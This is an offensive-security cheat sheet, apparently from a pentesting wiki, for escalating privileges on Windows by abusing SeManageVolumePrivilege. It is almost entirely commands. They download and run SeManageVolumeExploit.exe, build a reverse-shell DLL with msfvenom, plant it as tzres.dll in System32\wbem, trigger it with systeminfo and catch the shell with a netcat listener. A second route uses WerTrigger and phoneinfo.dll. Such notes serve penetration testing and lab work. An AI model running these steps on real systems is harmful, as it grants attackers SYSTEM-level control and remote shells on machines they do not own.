SeManageVolumePrivilege

https://hackfa.st/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeManageVolumePrivilege/

Download the EnableAllTokenPrivs.ps1 script and enable all privs

wget https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

Import-Module .\EnableAllTokenPrivs.ps1

whoami /priv

dll hijack with metasploit

wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe

.\SeManageVolumeExploit.exe



msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=1337 -f dll -o tzres.dll

copy tzres.dll C:\Windows\System32\wbem\

systeminfo 



rlwrap -cAr nc -lnvp 1337

WerTrigger

wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe

.\SeManageVolumeExploit.exe


wget https://github.com/sailay1996/WerTrigger/raw/master/bin/WerTrigger.exe
wget https://github.com/sailay1996/WerTrigger/raw/master/bin/phoneinfo.dll
wget https://raw.githubusercontent.com/sailay1996/WerTrigger/master/bin/Report.wer
cp /usr/share/windows-resources/binaries/nc.exe .

Copy phoneinfo.dll to C:\Windows\System32\

place Report.wer and WerTrigger.exe in the same directory, then run WerTrigger.exe

WerTrigger.exe produces no output; it waits for instructions

PreviousKRB_AP_ERR_SKEW - sync time with Domain NextSeBackupPrivilege

Last updated 4 months ago

hashtagdll hijack with metasploit

hashtagWerTrigger

dll hijack with metasploit

WerTrigger